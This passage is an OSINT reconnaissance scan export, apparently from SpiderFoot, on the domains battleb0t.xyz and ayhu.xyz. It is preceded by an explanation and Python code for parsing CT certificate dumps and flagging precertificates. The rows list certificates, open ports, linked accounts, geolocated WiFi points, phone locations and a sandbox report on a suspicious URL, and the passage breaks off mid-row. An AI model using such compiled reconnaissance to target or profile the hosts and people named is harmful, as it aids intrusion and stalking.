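The certificate rows in this table come in two shapes, and the difference matters when CT data is used for reconnaissance. The Let's Encrypt R3 certificate for battleb0t.xyz carries two Signed Certificate Timestamps and is the certificate a server can actually present. The GTS CA 1P5 row for *.battleb0t.xyz (and the Let's Encrypt E1 row for *.ayhu.xyz further down) instead carries the critical "CT Precertificate Poison" extension, which marks it as the precertificate submitted to the logs before issuance; clients reject a poisoned certificate, so such a row proves a certificate was requested for those names, not that it is deployed. That is also why the crt.sh-style record list below typically shows two entries per serial number, one for the precertificate and one for the leaf. The Python below is an added example, not SpiderFoot output and not part of the original scan: it parses the `openssl x509 -text` layout these cells use, flags precertificates, matches hostnames against wildcard SANs the way a TLS client does (one label only), and reports which certificates were valid at scan time plus the gap between notBefore and the first SCT (one hour for the Let's Encrypt leaf here, since Let's Encrypt backdates notBefore). The two sample dumps are constructed, abridged copies of rows from this table; `parse_cert_text`, `covers`, `ct_summary` and the dictionary field names are this example's own, not a SpiderFoot API.

```python
from datetime import datetime, timezone

# Constructed, abridged copies of two rows from this table in the same
# `openssl x509 -text` layout (only the header lines the parser reads kept):
# the Let's Encrypt R3 leaf for battleb0t.xyz and the GTS CA 1P5 precert.
LE_LEAF = """Certificate:
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
CT Precertificate SCTs:
Signed Certificate Timestamp:
Timestamp : Apr 26 03:43:31.388 2023 GMT
Signed Certificate Timestamp:
Timestamp : Apr 26 03:43:31.409 2023 GMT
"""

GTS_PRECERT = """Certificate:
Serial Number:
26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Mar 23 22:37:05 2023 GMT
Not After : Jun 21 22:37:04 2023 GMT
Subject: CN=*.battleb0t.xyz
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
CT Precertificate Poison: critical
NULL
"""


def _parse_time(s):
    # openssl prints 'Apr 26 02:43:31 2023 GMT'; SCT timestamps add milliseconds
    s = s.strip()
    fmt = "%b %d %H:%M:%S.%f %Y GMT" if "." in s else "%b %d %H:%M:%S %Y GMT"
    return datetime.strptime(s, fmt).replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Extract serial, names, validity, SCTs and precert status from a -text dump."""
    # Work on stripped lines so indentation (absent in the export above) is
    # irrelevant; values printed on the line after their label are read from it.
    lines = [ln.strip() for ln in text.splitlines()]
    cert = {"serial": None, "issuer": None, "subject": None, "not_before": None,
            "not_after": None, "sans": [], "is_precert": False, "sct_timestamps": []}
    for i, line in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if line == "Serial Number:":
            cert["serial"] = nxt.replace(":", "").lower()
        elif line.startswith("Issuer:"):
            cert["issuer"] = line.split(":", 1)[1].strip()
        elif line.startswith("Subject:"):
            cert["subject"] = line.split(":", 1)[1].strip()
        elif line.startswith("Not Before:"):
            cert["not_before"] = _parse_time(line.split(":", 1)[1])
        elif line.startswith("Not After"):
            cert["not_after"] = _parse_time(line.split(":", 1)[1])
        elif line == "X509v3 Subject Alternative Name:":
            cert["sans"] = [s.strip()[4:] for s in nxt.split(",") if s.strip().startswith("DNS:")]
        elif line.startswith("CT Precertificate Poison"):
            cert["is_precert"] = True  # CT-logged precert, never served on the wire
        elif line.startswith("Timestamp :"):
            cert["sct_timestamps"].append(_parse_time(line.split(":", 1)[1]))
    return cert


def covers(cert, hostname):
    """RFC 6125-style match: a '*.' SAN covers exactly one left-most label."""
    host = hostname.lower().rstrip(".")
    for san in (s.lower() for s in cert["sans"]):
        if san.startswith("*."):
            base = san[2:]
            if host.endswith("." + base) and "." not in host[: -len(base) - 1]:
                return True
        elif san == host:
            return True
    return False


def ct_summary(cert_texts, now):
    """Collapse a set of CT rows into the view an analyst wants at scan time."""
    certs = [parse_cert_text(t) for t in cert_texts]
    return {
        "names": sorted({n for c in certs for n in c["sans"]}),
        "precert_serials": [c["serial"] for c in certs if c["is_precert"]],
        "valid_now": [c["serial"] for c in certs if c["not_before"] <= now <= c["not_after"]],
        # seconds from notBefore to the first SCT (Let's Encrypt backdates notBefore)
        "sct_lag": {c["serial"]: (min(c["sct_timestamps"]) - c["not_before"]).total_seconds()
                    for c in certs if c["sct_timestamps"]},
    }


if __name__ == "__main__":
    scan_time = datetime(2023, 5, 12, 3, 0, tzinfo=timezone.utc)  # this scan's date
    for key, value in ct_summary([LE_LEAF, GTS_PRECERT], scan_time).items():
        print(key, value)
```

Run it against the full cells of this table by pasting each "Certificate: ... " value into a string; the parser ignores the modulus and signature bytes. For the ayhu.xyz E1 row the result will show `is_precert` set and an empty SCT list, and for the wildcard rows `covers` answers whether names such as fluid.battleb0t.xyz or kekw.battleb0t.xyz seen elsewhere in this scan fall under the wildcard.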
| 2023-05-12 02:44:35 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | fluid.battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2083 | 188.114.97.1 |
| 2023-05-12 02:44:09 | Raw Data from RIRs | No | CertSpotter | 1 | 0 | 1 | 0 | None | [{u'pubkey_sha256': u'b8939526809ab88640a6a7884ee8dcb607fb00f7e0fcea60466af2f352ad1591', u'cert_sha256': u'4c1b41a7240eddfb2785d811a40b2c4f57217bbf48c89ee37ab9bce9cbb2e8a1', u'revoked': False, u'not_after': u'2023-05-12T05:22:09Z', u'not_before': u'2023-02-11T05:22:10Z', u'cert': {u'data': u'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', u'sha256': u'4c1b41a7240eddfb2785d811a40b2c4f57217bbf48c89ee37ab9bce9cbb2e8a1', u'type': u'precert'}, u'dns_names': [u'*.ayhu.xyz', u'ayhu.xyz'], u'tbs_sha256': u'98d7b9ddd34587a9f0ca631c67a7ef0e434801d5af54bf0a58a4414132b54b78', u'id': u'4808403185', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'friendly_name': u'Google Trust Services', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}, {u'pubkey_sha256': u'dc08bc7c8382f13f52efa247fc61a39cf343f06bf7ea548d231815f230797186', u'cert_sha256': u'c7525168b3dd0eaab22aaa03f908df3de610c6fa812b471a74d4a9b4cc1f27a5', u'revoked': False, u'not_after': u'2023-07-10T04:54:49Z', u'not_before': u'2023-04-11T04:54:50Z', u'cert': {u'data': u'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', u'sha256': u'c7525168b3dd0eaab22aaa03f908df3de610c6fa812b471a74d4a9b4cc1f27a5', u'type': u'precert'}, u'dns_names': [u'*.ayhu.xyz', u'ayhu.xyz'], u'tbs_sha256': u'e25b9a56735c29036e5e585244fde0a2ba81adaf796b2d716bde988fd3954995', u'id': u'5073393240', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'friendly_name': u'Google Trust Services', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}] | ayhu.xyz |
| 2023-05-12 03:09:46 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 64.170.74.34.bc.googleusercontent.com | 34.74.170.64 |
| 2023-05-12 02:46:24 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | North Charleston, United States | 104.196.30.220 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000justin000.github.io | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | LINE (Category: social)
https://line.me/R/ti/p/@login?from=page | login |
| 2023-05-12 02:59:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://regclickonetwoget.com/?viwe=B5ZRVJ5AIOMUMPXF7NBL-8845fcbc2b0cfc99c4cf3eaf075db59ceb055d0a37e8', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3156 -s 132" (UID: 00000000-00003396)'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "DBWinMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ce4_IE_EarlyTabStart_0xf98_Mutex"\n "IsoScope_ce4_IESQMMUTEX_0_519"\n "IsoScope_ce4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3300"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ce4_ConnHashTable<3300>_HashTable_Mutex"\n "IsoScope_ce4_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ce4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00003396) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar11F6.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar11F4.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, 
u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3156 -s 132" (UID: 00000000-00003396)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab11F5.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "Cab11E4.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"2E2XLV93.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2E2XLV93.txt]- [targetUID: 00000000-00003300]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002144]\n "~DF31E7ED02A5F249E9.TMP" has type "data"- Location: [%TEMP%\\~DF31E7ED02A5F249E9.TMP]- [targetUID: 00000000-00003300]\n "BBB0B9C986171FE6F65C60CFDD8B124F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BBB0B9C986171FE6F65C60CFDD8B124F]- [targetUID: 00000000-00002144]\n "~DFA6E69F16FC353641.TMP" has type "data"- Location: [%TEMP%\\~DFA6E69F16FC353641.TMP]- [targetUID: 00000000-00003300]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003300]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003300]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003300]\n "Cab11F5.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab11F5.tmp]- [targetUID: 00000000-00002144]\n "Tar11F6.tmp" has type "data"- Location: [%TEMP%\\Tar11F6.tmp]- [targetUID: 00000000-00002144]\n "ZI3PUTBR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZI3PUTBR.txt]- [targetUID: 00000000-00003300]\n "LWLJIC7E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LWLJIC7E.txt]- [targetUID: 00000000-00003300]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003300]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003300]\n "Tar11F4.tmp" has type "data"- Location: [%TEMP%\\Tar11F4.tmp]- [targetUID: 00000000-00002144]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002144]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00002144]\n "~DFFFB79CCFFBC7C646.TMP" has type "data"- Location: [%TEMP%\\~DFFFB79CCFFBC7C646.TMP]- [targetUID: 00000000-00003300]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://regclickonetwoget.com/?viwe=B5ZRVJ5AIOMUMPXF7NBL-8845fcbc2b0cfc99c4cf3eaf075db59ceb055d0a37e8"- [Source: Input]\n Pattern match: "https://regclickonetwoget.com"- [Source: Input]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"HTTP/1.1 200 OK\nContent-Length: 281\nContent-Type: application/json; charset=utf-8\nServer: Microsoft-HTTPAPI/2.0\nX-CMS-SearchElapsedTimeInMilliseconds: 33\nX-CMS-SearchBackendTimeInMilliseconds: 30\nX-CMS-SearchMatchedTotal: 1\nX-CMS-SearchMaxScore: 0\nX-CMS-SearchShardsTotal: 80\nX-CMS-SearchShardsSuccessful: 80\nX-CMS-SearchShardsFailed: 0\nX-CMS-SearchReturnedCount: 1\nX-CMS-DocumentStorageTier: Cache\nEdge-control: max-age=900s,downstream-ttl=900s\nX-CMS-ExecutionTimeInMilliseconds: 1\nAppEx-Activity-Id: 2a0f4d89-6c8c-4bb7-94b7-ccf6e776546c\nX-Trace-Context: {"ActivityId":"2a0f4d89-6c8c-4bb7-94b7-ccf6e776546c"}\nMS-CV: 2LJ42NbMmUONOa4RjIh+ew.0\nX-CMS-ServiceLocation: westus:0\nDate: Mon, 01 Aug 2022 18:19:19 
GMT\n\n[{"list":[{"link":{"href":"goldbartext","title":""}},{"link":{"href":"okBtnText","title":""}},{"link":{"href":"cancelBtnText","title":""}},{"link":{"href":"intervalInDays","title":"20"}},{"link":{"href":"repeat","title":"1"}},{"link":{"href":"version","title":"3"}}],"_score":0.0}]"- [Source: SSL_52.155.62.95]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'descr | 34.74.170.74 |
| 2023-05-12 03:12:52 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Phoenix, US | +14805058800 |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https://yoink.site/auth&response_type=code&scope=identify guilds.join | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Gab (Category: political)
https://gab.com/ayhu | ayhu |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.168): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | IntelWLAN (Net ID: 00:02:B3:C4:42:9C) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.110): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.90): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:11:23 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Moscow, Russian Federation | +74955801111 |
| 2023-05-12 02:55:01 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 188.114.96.1 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Gitea - Gitea is a forge software package for hosting software development version control using Git as well as other collaborative features like bug tracking, code review, kanban boards, tickets, and wikis. It supports self-hosting but also provides a free public first-party instance. | cdn-185-199-111-153.github.com |
| 2023-05-12 02:59:57 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:10:b4:30:a3:e0:72:2f:ec:4e:bc:95:e3:12:bb:83:8d:6f
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Dec 14 04:12:32 2022 GMT
Not After : Mar 14 04:12:31 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:31:e0:5d:42:f2:be:35:60:b1:bf:3c:dd:6a:3a:
e9:66:ce:65:b9:42:55:e5:1f:5b:0f:4a:7d:d2:dd:
d5:d5:2a:c8:4c:26:cc:d6:24:4c:c6:8a:d7:5d:8d:
ad:45:7b:81:26:49:fc:64:c6:a9:da:25:d4:46:11:
f7:82:81:c2:c2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:9F:0E:73:7B:4F:1D:9B:10:7F:DE:3A:BF:95:29:99:72:64:39:CE
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:65:02:31:00:fd:8c:78:36:1c:71:84:4d:49:6c:11:58:c6:
12:a3:92:bc:28:1e:bf:5a:97:f1:6e:55:aa:8d:04:5e:52:f5:
43:5c:dd:10:26:0f:9b:fd:e7:99:a4:5c:91:c0:27:5e:27:02:
30:22:c5:07:b7:53:41:96:f1:8f:15:55:83:a7:26:c3:46:10:
aa:c0:ac:d9:d7:56:82:6e:c4:c8:be:12:fb:ae:7f:6d:a8:c6:
0a:3a:a2:c1:f9:63:1b:f1:d2:5d:a4:28:24
| ayhu.xyz |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 110.48.229.35.bc.googleusercontent.com | 35.229.48.110 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Computer security companies | baffin.netcraft.com |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': 
u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': 